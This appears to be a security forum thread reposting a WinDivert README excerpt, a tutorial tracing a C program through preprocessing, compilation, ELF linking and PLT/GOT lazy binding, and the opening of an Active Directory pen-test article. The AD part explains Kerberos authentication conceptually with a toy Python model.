    The WinDivert.sys driver is installed below the Windows network stack.  The
    following actions occur:
    
    (1) A new packet enters the network stack and is intercepted by WinDivert.sys
    (2a) If the packet matches the PROGRAM-defined filter, it is diverted.  The
        PROGRAM can then read the packet using a call to WinDivertRecv().
    (2b) If the packet does not match the filter, the packet continues as normal.
    (3) PROGRAM either drops, modifies, or re-injects the packet.  PROGRAM can
        re-inject the (modified) packet using a call to WinDivertSend().
    
    3. License
    ----------
    
    WinDivert is dual-licensed under your choice of the GNU Lesser General Public
    License (LGPL) Version 3 or the GNU General Public License (GPL) Version 2.
    See the LICENSE file for more information.
    
    4. About
    --------
    
    WinDivert was written by basil.
    
    For further information, or bug reports, please contact:
    
        basil@reqrypt.org
    
    The homepage for WinDivert is:
    
        https://reqrypt.org/windivert.html
    
    The source code for WinDivert is hosted by GitHub at:
    
        https://github.com/basil00/Divert
    

     

    Sursa: https://github.com/basil00/Divert

  15. Life of a binary

    Written on April 15th, 2017 by Kishu Agarwal

    Almost every one of you must have written a program, compiled it and then run it to see the fruits of your hard labour. It feels good to finally see your program working, doesn't it? But to make all of this work, we have someone else to thank too. And that is your compiler (assuming, of course, that you are working in a compiled language, not an interpreted one), which also does so much hard work behind the scenes.

    In this article, I will try to show you how the source code that you write is transformed into something that your machine is actually able to run. I am choosing Linux as my host machine and C as the programming language here, but the concepts here are general enough to apply to many compiled languages out there.

    Note: If you want to follow along in this article, then you will have to make sure that you have gcc, elfutils installed on your local machine.

    Let’s start with a simple C program and see how it gets converted by the compiler.

    #include <stdio.h>
     
    // Main function
    int main(void) {
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
    }

    This program creates two variables, adds them up and print the result on the screen. Pretty simple, huh?

    But let’s see what this seemingly simple program has to go through to finally get executed on your system.

    The compiler usually goes through the following five steps (with the last step being part of the OS)-

     

    [Figure: the five stages of the pipeline: Preprocessing → Compilation → Assembly → Linking → Loading]

    Let’s go through each of the step in sufficient detail.

     

    [Figure: the pipeline with the Preprocessing stage highlighted]

    The first step is the Preprocessing step, which is done by the Preprocessor. The job of the Preprocessor is to handle all the preprocessor directives present in your code. These directives start with #. But before it processes them, it first removes all the comments from the code, as comments are there only for human readability. It then finds all the # commands and does what each command says.

    In the code above, we have just used the #include directive, which simply tells the Preprocessor to copy the stdio.h file and paste it into this file at the current location.
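
    To build intuition for what the Preprocessor does with #include, here is a toy Python model. It only handles quoted includes resolved from an in-memory dict and ignores every other directive, unlike the real cpp:

    ```python
    import re

    def preprocess(source, headers):
        """Toy model of the Preprocessor's #include handling: each
        `#include "name"` line is replaced with the named header's
        contents (recursively); all other lines pass through unchanged."""
        out = []
        for line in source.splitlines():
            m = re.match(r'\s*#include\s+"(.+)"', line)
            if m:
                out.append(preprocess(headers[m.group(1)], headers))
            else:
                out.append(line)
        return "\n".join(out)
    ```

    Running a file containing `#include "stdio.h"` through this function splices the header's text into the output, which is exactly the shape of what `gcc -E` prints.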

    You can see the output of the Preprocessor by passing -E flag to the gcc compiler.

    gcc -E sample.c

    You would get something like the following-

    # 1 "sample.c"
    # 1 "<built-in>"
    # 1 "<command-line>"
    # 1 "/usr/include/stdc-predef.h" 1 3 4
    # 1 "<command-line>" 2
    # 1 "sample.c"
     
    # 1 "/usr/include/stdio.h" 1 3 4
     
    -----omitted-----
     
     
    # 5 "sample.c"
    int main(void) {
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
    }

     

    [Figure: the pipeline with the Compilation stage highlighted]

    Confusingly, the second step is also called compilation. The compiler takes the output from the Preprocessor and is responsible for the following important tasks.

    • Pass the output through a lexical analyser to identify the various tokens present in the file. Tokens are just the literals present in your program, like ‘int’, ‘return’, ‘void’, ‘0’ and so on. The lexical analyser also associates a type with each token: whether it is a string literal, an integer, a float, an if token, and so on.

    • Pass the output of the lexical analyser to the syntax analyser to check whether the program is written in a way that satisfies the grammar rules of the language. For example, it will raise a syntax error when parsing this line of code,

        b = a + ;

    since + is missing an operand.

    • Pass the output of the syntax analyser to the semantic analyser, which checks whether the program satisfies the semantics of the language, such as type checking and making sure variables are declared before their first use.

    • If the program is syntactically correct, the source code is then converted into assembly instructions for the specified target architecture. By default, gcc generates assembly for the machine it is running on. But suppose you are building programs for embedded systems; then you can pass the architecture of the target machine and gcc will generate assembly for that machine.
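
    The lexical-analysis task from the first bullet can be illustrated with a toy tokenizer. This Python sketch covers only a tiny slice of C's real token set:

    ```python
    import re

    # Toy token patterns -- a tiny slice of what a real C lexer handles.
    TOKEN_SPEC = [
        ("KEYWORD", r"\b(?:int|return|void)\b"),
        ("NUMBER",  r"\d+"),
        ("IDENT",   r"[A-Za-z_]\w*"),
        ("OP",      r"[=+;(){}]"),
        ("SKIP",    r"\s+"),
    ]
    MASTER = re.compile("|".join(f"(?P<{n}>{p})" for n, p in TOKEN_SPEC))

    def tokenize(code):
        """Lexical analysis: split source text into (type, literal) pairs,
        discarding whitespace."""
        return [(m.lastgroup, m.group())
                for m in MASTER.finditer(code) if m.lastgroup != "SKIP"]
    ```

    Feeding it `int a = 1;` yields the token stream the syntax analyser would then check against the grammar.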

    To see the output from this stage, pass the -S flag to the gcc compiler.

    gcc -S sample.c

    You would get something like the following, depending on your environment.

    .file "sample.c" // name of the source file
    .section .rodata // Read only data
    .LC0: // Local constant
    .string "%d\n" // string constant we used
    .text // beginning of the code segment
    .globl main // declare main symbol to be global
    .type main, @function // main is a function
    main: // beginning of main function
    .LFB0: // Local function beginning
    .cfi_startproc // ignore them
    pushq %rbp // save the caller's frame pointer
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp // set the current stack pointer as the frame base pointer
    .cfi_def_cfa_register 6
    subq $16, %rsp // set up the space
    movl $1, -12(%rbp)
    movl $2, -8(%rbp)
    movl -12(%rbp), %edx
    movl -8(%rbp), %eax
    addl %edx, %eax
    movl %eax, -4(%rbp)
    movl -4(%rbp), %eax
    movl %eax, %esi
    movl $.LC0, %edi
    movl $0, %eax
    call printf
    movl $0, %eax
    leave
    .cfi_def_cfa 7, 8
    ret // return from the function
    .cfi_endproc
    .LFE0:
    .size main, .-main // size of the main function
    .ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609"
    .section .note.GNU-stack,"",@progbits // make stack non-executable

    If you don’t know assembly language, it all looks pretty scary at first, but it is not that bad. It takes more time to understand assembly than your normal high-level language code, but given enough time, you can surely read it.

    Let’s see what this file contains.

    All the lines beginning with ‘.’ are assembler directives. .file denotes the name of the source file, which can be used for debugging purposes. The string literal %d\n from our source code now resides in the .rodata section (ro means read-only), since it is a read-only string. The compiler named this string .LC0 so it can refer to it later in the code. Whenever you see a label starting with .L, it means that label is local to the current file and will not be visible from other files.

    .globl tells that main is a global symbol, which means main can be called from other files. .type tells that main is a function. Then follows the assembly for the main function itself. You can ignore the directives starting with .cfi; they are used for call stack unwinding in case of exceptions. We will ignore them in this article, but you can read more about them here.

    Let’s now try to understand the assembly of the main function.

     

    [Figures 1–3: stack frames. Fig. 1: rsp and rbp before the main function call. Fig. 2: saving the caller's frame pointer (old rbp pushed, rbp set to rsp, call it X). Fig. 3: setting local variables, with the values of a, b and c at rbp-12, rbp-8 and rbp-4 and rsp 16 bytes below rbp.]

    pushq %rbp — You may already know that when you call a function, a new stack frame is created for it. To make that possible, we need some way of recovering the caller’s frame pointer when the new function returns. That’s why we push the current frame pointer, stored in the rbp register, onto the stack.

    movq %rsp, %rbp — Move the current stack pointer into the base pointer. This becomes our current function’s frame pointer. Fig. 1 depicts the state before pushing the rbp register, and Fig. 2 the state after the previous frame pointer is pushed and the stack pointer is moved into the frame pointer.

    subq $16, %rsp — We have 3 local variables in our program, all of type int. On my machine, each int occupies 4 bytes, so we need 12 bytes of space on the stack to hold our local variables. We create space for them by decrementing the stack pointer by the number of bytes we need; decrementing, because the stack grows from higher addresses to lower addresses. But here we decrement by 16 instead of 12. The reason is that stack space is allocated in chunks of 16 bytes, so even if you have a single local variable, 16 bytes would be reserved on the stack. This is done for performance reasons on some architectures. See Fig. 3 for how the stack is laid out right now.

    movl/addl sequence — This code is pretty straightforward. The compiler has used the slot rbp-12 as the storage for variable a, rbp-8 for b and rbp-4 for c. It moves the values 1 and 2 to the addresses of variables a and b respectively. To prepare for the addition, it moves the value of a into the edx register and the value of b into the eax register. The result of the addition is stored in the eax register and then transferred to the address of the c variable.

    printf call — Then we prepare for our printf call. First, the value of the c variable is moved into the esi register, and then the address of our string constant %d\n is moved into the edi register. The esi and edi registers now hold the arguments of our printf call: edi holds the first argument and esi the second. Then we call the printf function to print the value of c formatted as an integer. One point to note here is that the printf symbol is undefined at this point. We will see how the printf symbol gets resolved later in this article.

    .size gives the size of the main function in bytes. “.-main” is an expression in which the . symbol means the address of the current line, so it evaluates to the address of the current line minus the address of main, which gives us the size of the main function in bytes.

    .ident just tells the assembler to add the following line to the .comment section. .note.GNU-stack tells whether the stack for this program is executable or not. Its value is usually the empty string, which marks the stack as non-executable.

     

    [Figure: build pipeline (Preprocessing → Compilation → Assembly → Linking → Loading); current stage: Assembly]

    What we have right now is our program in assembly language, but that is still not a form the processor understands. We have to convert the assembly language to machine language, and that work is done by the assembler. The assembler takes your assembly file and produces an object file, a binary file containing the machine instructions for your program.

    Let’s convert our program to an object file to see the process in action. To get the object file for your program, pass the -c flag to the gcc compiler.

    gcc -c sample.c

    You would get an object file with a .o extension. Since this is a binary file, you won’t be able to open it in a normal text editor to view its contents. But we have tools at our disposal to find out what lies inside those object files.

    Object files come in many different file formats. We will focus on the one used on Linux: the ELF file format.

    An ELF file contains the following:

    • ELF Header
    • Program header table
    • Section header table
    • Some other data referred to by the previous tables

    The ELF Header contains meta information about the object file, such as the type of the file, the machine the binary is built for, the version, the size of the header, etc. To view the header, pass the -h flag to the eu-readelf utility.

    $ eu-readelf -h sample.o
    ELF Header:
    Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
    Class: ELF64
    Data: 2's complement, little endian
    Ident Version: 1 (current)
    OS/ABI: UNIX - System V
    ABI Version: 0
    Type: REL (Relocatable file)
    Machine: AMD x86-64
    Version: 1 (current)
    Entry point address: 0
    Start of program headers: 0 (bytes into file)
    Start of section headers: 704 (bytes into file)
    Flags:
    Size of this header: 64 (bytes)
    Size of program header entries: 0 (bytes)
    Number of program headers entries: 0
    Size of section header entries: 64 (bytes)
    Number of section headers entries: 13
    Section header string table index: 10

    From the above listing, we see that this file doesn’t have any program headers, and that is fine: program headers are only present in executable files and shared libraries. We will see program headers when we link the file in the next step.

    But we do have 13 sections. Let’s see what these sections are. Use the -S flag.

    $ eu-readelf -S sample.o
    There are 13 section headers, starting at offset 0x2c0:
     
    Section Headers:
    [Nr] Name Type Addr Off Size ES Flags Lk Inf Al
    [ 0] NULL 0000000000000000 00000000 00000000 0 0 0 0
    [ 1] .text PROGBITS 0000000000000000 00000040 0000003c 0 AX 0 0 1
    [ 2] .rela.text RELA 0000000000000000 00000210 00000030 24 I 11 1 8
    [ 3] .data PROGBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1
    [ 4] .bss NOBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1
    [ 5] .rodata PROGBITS 0000000000000000 0000007c 00000004 0 A 0 0 1
    [ 6] .comment PROGBITS 0000000000000000 00000080 00000035 1 MS 0 0 1
    [ 7] .note.GNU-stack PROGBITS 0000000000000000 000000b5 00000000 0 0 0 1
    [ 8] .eh_frame PROGBITS 0000000000000000 000000b8 00000038 0 A 0 0 8
    [ 9] .rela.eh_frame RELA 0000000000000000 00000240 00000018 24 I 11 8 8
    [10] .shstrtab STRTAB 0000000000000000 00000258 00000061 0 0 0 1
    [11] .symtab SYMTAB 0000000000000000 000000f0 00000108 24 12 9 8
    [12] .strtab STRTAB 0000000000000000 000001f8 00000016 0 0 0 1

    You don’t need to understand the whole of the above listing. But essentially, for each section it lists information such as the section’s name, its size and its offset from the start of the file. The important sections for our purposes are the following:

    • The .text section contains our machine code.
    • The .rodata section contains the read-only data of our program: constants or string literals you may have used. Here it just contains %d\n.
    • The .data section contains the initialized data of our program. Here it is empty, since we don’t have any initialized data.
    • The .bss section is like the .data section but contains the uninitialized data of our program, e.g. an array declared as int arr[100]. One point to note about the .bss section is that, unlike the other sections, which occupy space proportional to their content, it records only its size. The reason is that at load time, all that is needed is the number of bytes to reserve for this section, and storing just the size keeps the final executable smaller.
    • The .strtab section lists all the strings contained in our program.
    • The .symtab section is the symbol table. It contains all the symbols (variable and function names) of our program.
    • The .rela.text section is the relocation section. More about this later.

    You can also view the contents of these sections: just pass the corresponding section number to the eu-readelf program. You can also use the objdump tool, which can additionally provide a disassembly of some of the sections.

    Let’s talk in a little more detail about the .rela.text section. Remember the printf function we used in our program. printf is not something we defined ourselves; it is part of the C library. Normally when you compile your C programs, the compiler does not bundle the C library functions you call into your executable, which reduces the size of the final executable. Instead, a table is made of all such symbols, called a relocation table, which is later filled in by something called the loader. We will discuss the loader later on, but for now, the important thing is that if you look at the .rela.text section, you will find the printf symbol listed there. Let’s confirm that here.

    $ eu-readelf -r sample.o
     
    Relocation section [ 2] '.rela.text' for section [ 1] '.text' at offset 0x210 contains 2 entries:
    Offset Type Value Addend Name
    0x0000000000000027 X86_64_32 000000000000000000 +0 .rodata
    0x0000000000000031 X86_64_PC32 000000000000000000 -4 printf
     
    Relocation section [ 9] '.rela.eh_frame' for section [ 8] '.eh_frame' at offset 0x240 contains 1 entry:
    Offset Type Value Addend Name
    0x0000000000000020 X86_64_PC32 000000000000000000 +0 .text

    You can ignore the second relocation section, .rela.eh_frame. It has to do with exception handling, which is not of much interest to us here. Let’s look at the first section. There we see two entries, one of which is our printf symbol. This entry means that a symbol named printf is used in this file but has not been defined, and that it is located at offset 0x31 from the start of the .text section. Let’s check what is at offset 0x31 in the .text section right now.

    $ eu-objdump -d -j .text sample.o
    sample.o: elf64-elf_x86_64
     
    Disassembly of section .text:
     
    0: 55 push %rbp
    1: 48 89 e5 mov %rsp,%rbp
    4: 48 83 ec 10 sub $0x10,%rsp
    8: c7 45 f4 01 00 00 00 movl $0x1,-0xc(%rbp)
    f: c7 45 f8 02 00 00 00 movl $0x2,-0x8(%rbp)
    16: 8b 55 f4 mov -0xc(%rbp),%edx
    19: 8b 45 f8 mov -0x8(%rbp),%eax
    1c: 01 d0 add %edx,%eax
    1e: 89 45 fc mov %eax,-0x4(%rbp)
    21: 8b 45 fc mov -0x4(%rbp),%eax
    24: 89 c6 mov %eax,%esi
    26: bf 00 00 00 00 mov $0x0,%edi
    2b: b8 00 00 00 00 mov $0x0,%eax
    30: e8 00 00 00 00 callq 0x35 <<<<<< offset 0x31
    35: b8 00 00 00 00 mov $0x0,%eax
    3a: c9 leaveq
    3b: c3 retq

    Here you can see the call instruction at offset 0x30. e8 is the opcode of the call instruction, followed by the 4 bytes at offsets 0x31 to 0x34, which should correspond to the actual address of our printf function. We don’t have that address right now, so they are just 00’s. (Later on, we will see that this location doesn’t actually hold the printf address, but calls it indirectly using something called the plt table. We will cover that part later.)

     

    [Figure: build pipeline (Preprocessing → Compilation → Assembly → Linking → Loading); current stage: Linking]

    All the things we have done till now operated on a single source file. But in reality, that is rarely the case. In real production code, you may have hundreds of thousands of source files to compile into an executable. How do the steps we followed so far change in that case?

    Well, the steps all remain the same. All the source files get individually preprocessed, compiled and assembled, and we end up with a separate object file for each.

    But the source files were not written in isolation: they contain functions and global variables that are defined in one file and used at different locations in other files.

    It is the job of the linker to gather all the object files, go through each of them, and track which symbols each file defines and which symbols it uses. It finds all this information in the symbol table of each object file. After gathering it, the linker creates a single object file, combining the sections of the individual object files into their corresponding sections and relocating all the symbols that can be resolved.

    In our case, we don’t have a collection of source files, we have just one, but since we use the printf function from the C library, our program will be dynamically linked with the C library. Let’s now link our program and investigate the output further.

    gcc sample.c

    I won’t go into much detail here, since the result is also an ELF file like the one we saw above, just with some new sections. One thing to note: in the object file we got from the assembler, the addresses were relative. But after linking all the files, we have a pretty good idea where all the pieces go, so if you examine the output of this stage, it contains absolute addresses as well.

    At this stage, the linker has identified all the symbols used in our program, who uses them, and who defines them. The linker simply maps the address of each symbol’s definition to its usages. But after all this, some symbols remain unresolved at this point, one of them being our printf symbol. In general, these are symbols that are externally defined variables or externally defined functions. The linker also creates a relocation table, just like the one created by the assembler, containing the entries that are still unresolved.

    At this point, there is one thing you should know. The functions and data you use from other libraries can be statically or dynamically linked. Static linking means that the functions and data from those libraries are copied into your executable. With dynamic linking, those functions and data are not copied into your executable, reducing its final size.

    For a library to support dynamic linking against it, it must be a shared library (a .so file). Commonly used libraries usually come as shared libraries, and one of them is our libc. libc is used by so many programs that if every program statically linked against it, there would at any moment be many copies of the same code occupying space in memory. Dynamic linking avoids this problem: at any moment only one copy of libc occupies memory, and all programs reference that one shared library.

    To make dynamic linking possible, the linker creates two more sections that weren’t there in the object code generated by the assembler: the .plt (Procedure Linkage Table) and .got (Global Offset Table) sections. We will cover these sections when we come to loading our executable, as that is when they become useful.

     

    [Figure: build pipeline (Preprocessing → Compilation → Assembly → Linking → Loading); current stage: Loading]

    Now it is time to actually run our executable file.

    When you click on the file in your GUI, or run it from the command line, the execve system call is ultimately invoked. It is in this system call that the kernel starts the work of loading your executable into memory.

    Remember the Program Header Table from above. This is where it becomes very useful.

    $ eu-readelf -l a.out
    Program Headers:
    Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
    PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8
    INTERP 0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R 0x1
    [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
    LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x000724 0x000724 R E 0x200000
    LOAD 0x000e10 0x0000000000600e10 0x0000000000600e10 0x000228 0x000230 RW 0x200000
    DYNAMIC 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d0 0x0001d0 RW 0x8
    NOTE 0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R 0x4
    GNU_EH_FRAME 0x0005f8 0x00000000004005f8 0x00000000004005f8 0x000034 0x000034 R 0x4
    GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
    GNU_RELRO 0x000e10 0x0000000000600e10 0x0000000000600e10 0x0001f0 0x0001f0 R 0x1
     
    Section to Segment mapping:
    Segment Sections...
    00
    01 [RO: .interp]
    02 [RO: .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame]
    03 [RELRO: .init_array .fini_array .jcr .dynamic .got] .got.plt .data .bss
    04 [RELRO: .dynamic]
    05 [RO: .note.ABI-tag .note.gnu.build-id]
    06 [RO: .eh_frame_hdr]
    07
    08 [RELRO: .init_array .fini_array .jcr .dynamic .got]

     

    How would the kernel know where to find this table in the file? That information is found in the ELF Header, which always starts at offset 0 in the file. Having read it, the kernel looks up all the entries of type LOAD and loads them into the memory space of the process.

    As you can see from the above listing, there are two entries of type LOAD. You can also see which sections are contained in each segment.

    Modern operating systems and processors manage memory in terms of pages. Your computer’s memory is divided into fixed-size chunks, and when a process asks for memory, the operating system allots it some number of pages. Apart from managing memory efficiently, this also provides security: the kernel can set protection bits for each page, which specify whether the page is read-only, writable or executable. A page marked read-only can’t be modified, preventing intentional or unintentional modification of data.

    Read-only pages have another benefit: multiple running processes of the same program can share the same pages. Since the pages are read-only, no process can modify them, so every process works just fine.

    To set up these protection bits, we have to tell the kernel which pages must be marked read-only and which may be written or executed. This information is stored in the Flags field of each of the entries above.

    Notice the first LOAD entry. It is marked R and E, which means this segment can be read and executed but not modified. If you look below at which sections fall into this segment, you can see two familiar ones, .text and .rodata. Thus our code and read-only data can only be read and executed, not modified, which is exactly what should happen.

    Similarly, the second LOAD entry contains the initialized and uninitialized data and the GOT table (more on this later), which are marked RW and thus can be read and written but not executed.

    After loading these segments and setting up their permissions, the kernel checks whether there is an INTERP segment. A statically linked executable has no need for it, since the executable contains all the code it needs, but for a dynamically linked executable this segment is important. It contains the .interp section, which holds the path to the dynamic linker. (You can check that there is no INTERP segment in a statically linked executable by passing the -static flag to gcc and examining the program header table of the resulting executable.)

    In our case, the kernel finds one, and it points to the dynamic linker at /lib64/ld-linux-x86-64.so.2. Just as with our executable, the kernel loads this shared object by reading its header, finding its segments and loading them into the memory space of our program. In a statically linked executable, where none of this is needed, the kernel would hand control directly to our program; here, the kernel hands control to the dynamic linker and pushes the address of our main function onto the stack, so that when the dynamic linker finishes its job, it knows where to hand control over to.

    We should now understand the two tables we have been skipping over for too long: the Procedure Linkage Table and the Global Offset Table, as they are closely related to the work of the dynamic linker.

    There are two types of relocations your program might need: variable relocations and function relocations. For an externally defined variable, we add an entry in the GOT table; for an externally defined function, we add entries in both tables. So the GOT table has entries for all externally defined variables as well as functions, while the PLT table has entries only for the functions. The reason we have two entries for functions will become clear in the following example.

    Let us take the printf function as an example to see how these tables work. In our main function, let’s look at the call instruction to the printf function.

    400556:    e8 a5 fe ff ff           callq   0x400400

    This call instruction calls an address that is part of the .plt section. Let’s see what is there.

    $ objdump -d -j .plt a.out
    a.out: file format elf64-x86-64
     
    Disassembly of section .plt:
     
    00000000004003f0 <printf@plt-0x10>:
    4003f0: ff 35 12 0c 20 00 pushq 0x200c12(%rip) # 601008 <_GLOBAL_OFFSET_TABLE_+0x8>
    4003f6: ff 25 14 0c 20 00 jmpq *0x200c14(%rip) # 601010 <_GLOBAL_OFFSET_TABLE_+0x10>
    4003fc: 0f 1f 40 00 nopl 0x0(%rax)
     
    0000000000400400 <printf@plt>:
    400400: ff 25 12 0c 20 00 jmpq *0x200c12(%rip) # 601018 <_GLOBAL_OFFSET_TABLE_+0x18>
    400406: 68 00 00 00 00 pushq $0x0
    40040b: e9 e0 ff ff ff jmpq 4003f0 <_init+0x28>
     
    0000000000400410 <__libc_start_main@plt>:
    400410: ff 25 0a 0c 20 00 jmpq *0x200c0a(%rip) # 601020 <_GLOBAL_OFFSET_TABLE_+0x20>
    400416: 68 01 00 00 00 pushq $0x1
    40041b: e9 d0 ff ff ff jmpq 4003f0 <_init+0x28>

    For each externally defined function, we have an entry in the .plt section; they all look the same and have three instructions, except the first entry. That is a special entry whose use we will see later.

    There we find a jump to the value contained at address 0x601018. This address is an entry in the GOT table. Let’s look at its contents.

    $ objdump -s a.out | grep -A 3 '.got.plt'
    Contents of section .got.plt:
    601000 280e6000 00000000 00000000 00000000 (.`.............
    601010 00000000 00000000 06044000 00000000 ..........@.....
    601020 16044000 00000000 ..@.....

    This is where the magic happens. Except for the first time the printf function is called, the value at this address is the actual address of the printf function in the C library, and we simply jump to that location. But the first time, something else happens.

    When the printf function is called for the first time, the value at this location is the address of the next instruction in printf’s plt entry. As you can see from the listing above, that is 400406, stored in little-endian format. At that location in the plt entry, we have a push instruction that pushes 0 onto the stack. Every plt entry has the same push instruction, but each pushes a different number: 0 here denotes the offset of the printf symbol in the relocation table. The push instruction is then followed by a jump to the first instruction of the first plt entry.

    Remember from above when I told you the first entry is special: this is where the dynamic linker is called to resolve external symbols and relocate them. To do that, we jump to the address contained at address 601010 in the got table. That slot should contain the address of the dynamic linker routine that handles relocation. In the file it is filled with 0’s, but it is filled in at run time, when the kernel invokes the dynamic linker.

    When the routine is called, the linker resolves the symbol that was pushed earlier (in our case, 0) from the external shared objects and puts the correct address of the symbol into the got table. From then on, when the printf function is called, we don’t have to consult the linker; we jump from the plt directly to the printf function in the C library.

    This process is called lazy binding (often also called lazy loading). A program may contain many external symbols, but a single run may not call all of them, so symbol resolution is deferred until first use, saving us some program startup time.

    As you can see from the discussion above, we never had to modify the plt section, only the got section. That is why the plt section is in the first LOAD segment, marked read-only, while the got section is in the second LOAD segment, marked writable.

    And this is how the dynamic linker works. I have skipped over lots of gory details, but if you are interested in more, you can check out this article.

    Let’s go back to loading our program. We have already done most of the work: the kernel has loaded all the loadable segments and invoked the dynamic linker. All that is left is to invoke our main function, and that is done by the dynamic linker once it finishes. When it calls our main function, we get the following output in our terminal:

    3

    And that my friend, is bliss.

    Thank you for reading my article. Let me know if you liked my article or any other suggestions for me, in the comments section below. And please, feel free to share :)

     

    Sursa: https://kishuagarwal.github.io/life-of-a-binary.html

  16. Exploring, Exploiting Active Directory Pen Test

    Active Directory is most commonly used in enterprise infrastructure to manage thousands of computers in an organization from a single point of control, the “Domain Controller”. Penetration testing of Active Directory is particularly interesting, as it is a prime target of many APT groups using a lot of different techniques. We will focus on the basics of Active Directory to understand its components before the attack.

    Understanding the Active Directory and its Components

    Directory Service:

    A Directory Service is a hierarchical structure that maps the names of all resources in the network to their network addresses. It allows you to store, organize and manage all network resources and defines a naming structure, making it easier to manage all devices from a single system.

    Active Directory:

    Active Directory is Microsoft’s implementation of directory services. It follows the X.500 specification and works at the application layer of the OSI model. It allows administrators to control all users and resources in the network from a single server, and stores information about them in a single database, the Directory Service Database. At its core, Active Directory uses Kerberos for authentication of users and LDAP for retrieving directory information.

    Domain Controller (DC)

    A Domain Controller is a Windows Server running Active Directory Domain Services in a domain. All users, user information, computers and their policies are controlled by a Domain Controller. Every user must authenticate with the Domain Controller to access any resource or service in the domain. It defines the policies for all users: what actions can be performed, what level of privileges is granted, and so on. It makes administrators’ lives easier when managing the users and computers in the network.

    Naming Conventions in AD:

    An object is any network resource in an Active Directory domain: computers, users, printers and so on.

    A domain is a logical grouping of objects in the organization. It defines a security boundary and allows objects within that boundary to share data with each other. Information about all objects within the domain is stored in the domain controller.

    A tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalog, a central repository of information about all objects.

    A forest is a collection of one or more trees which share a common directory schema, Global Catalog and configuration across the organization.

    Kerberos Authentication:

    Kerberos is an authentication protocol used for single sign-on (SSO). The idea of SSO is to authenticate once and then use the resulting ticket to access any service you are authorized to use.

    image-1.png

    The Kerberos authentication process works as follows:

    Step 1: The user sends an Authentication Service Request (AS_REQ) to the Key Distribution Center (KDC) for a Ticket Granting Ticket (TGT), containing the User Principal Name (UPN) and the current timestamp encrypted with a key derived from the user's password.

    Step 2: The KDC decrypts the request (AS_REQ) with its local copy of the user's key and checks the UPN and timestamp. After verification, it responds with a reply (AS_REP) containing two encrypted parts: the TGT, encrypted with the KDC's own (krbtgt) key, and a session key with an expiry timestamp, encrypted with the hash of the user's password.

    Step 3: The user's machine caches the TGT and session key. The TGT is used when requesting access to a service; the session key is used for further communication with the KDC, so credentials are not required again. Every resource in the domain is exposed as a service and requires a service ticket.

    Step 4: The user's machine sends a request (TGS_REQ) to the KDC for a Ticket Granting Service (TGS) ticket. It contains the TGT, the Service Principal Name (SPN) naming the service along with its IP address and port number, and a timestamp encrypted with the session key received in Step 2.

    Step 5: The KDC decrypts the request with the user's session key and checks the SPN, the timestamp and the TGT (which it decrypts with the krbtgt key). If all the details are valid, it sends a reply (TGS_REP) with the TGS ticket encrypted with the password hash of the service account, and a ticket expiry timestamp encrypted with the AS_REP session key.

    Step 6: The user's machine decrypts the reply with the session key and extracts the TGS ticket, then forwards it to the application in an AP_REQ. The application decrypts the ticket with its own key and extracts the session key and the client's attributes, such as privileges and group memberships. It verifies these details and grants access to the application.

    This is the complete Kerberos authentication process as implemented in Active Directory.
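    As a toy illustration of the message flow above, the sketch below models the AS and TGS exchanges in Python. The "encryption" is a deliberately fake XOR keystream, and all names, passwords and SPNs are hypothetical; real Kerberos uses RC4/AES and ASN.1-encoded tickets, so treat this purely as a model of who can decrypt what.

```python
import hashlib
import json

def derive_key(password: str) -> bytes:
    # Stand-in for the long-term key derived from a password (NT hash / AES key).
    return hashlib.sha256(password.encode()).digest()

def _xor(key: bytes, data: bytes) -> bytes:
    # Toy "cipher" for illustration only -- NOT real cryptography.
    stream = (hashlib.sha256(key).digest() * (len(data) // 32 + 1))[:len(data)]
    return bytes(a ^ b for a, b in zip(data, stream))

def seal(key: bytes, obj: dict) -> bytes:
    return _xor(key, json.dumps(obj, sort_keys=True).encode())

def unseal(key: bytes, blob: bytes) -> dict:
    return json.loads(_xor(key, blob))  # garbage under a wrong key fails to parse

# Hypothetical KDC state: long-term keys for krbtgt, one service and one user.
KRBTGT_KEY = derive_key("krbtgt-long-term-secret")
SERVICE_KEYS = {"cifs/fileserver.lab.local": derive_key("svc-password")}
USER_KEYS = {"alice@LAB.LOCAL": derive_key("alice-password")}

def as_exchange(upn: str, enc_timestamp: bytes):
    # Steps 1-2: validate pre-auth, return TGT (sealed with the krbtgt key) + session key.
    unseal(USER_KEYS[upn], enc_timestamp)            # pre-authentication check
    session_key = hashlib.sha256((upn + "|session").encode()).hexdigest()
    tgt = seal(KRBTGT_KEY, {"upn": upn, "session": session_key})
    return tgt, seal(USER_KEYS[upn], {"session": session_key})

def tgs_exchange(tgt: bytes, spn: str) -> bytes:
    # Steps 4-5: the KDC decrypts the TGT with its own key and issues a service
    # ticket sealed with the *service account's* key (the property Kerberoasting abuses).
    claims = unseal(KRBTGT_KEY, tgt)
    return seal(SERVICE_KEYS[spn], {"upn": claims["upn"], "spn": spn})

# Client side: authenticate once, then request a ticket for the file server.
alice_key = derive_key("alice-password")
tgt, _enc_part = as_exchange("alice@LAB.LOCAL", seal(alice_key, {"ts": 1555833600}))
ticket = tgs_exchange(tgt, "cifs/fileserver.lab.local")
# Step 6 (AP_REQ): the service decrypts the ticket with its own key.
print(unseal(SERVICE_KEYS["cifs/fileserver.lab.local"], ticket)["upn"])  # alice@LAB.LOCAL
```

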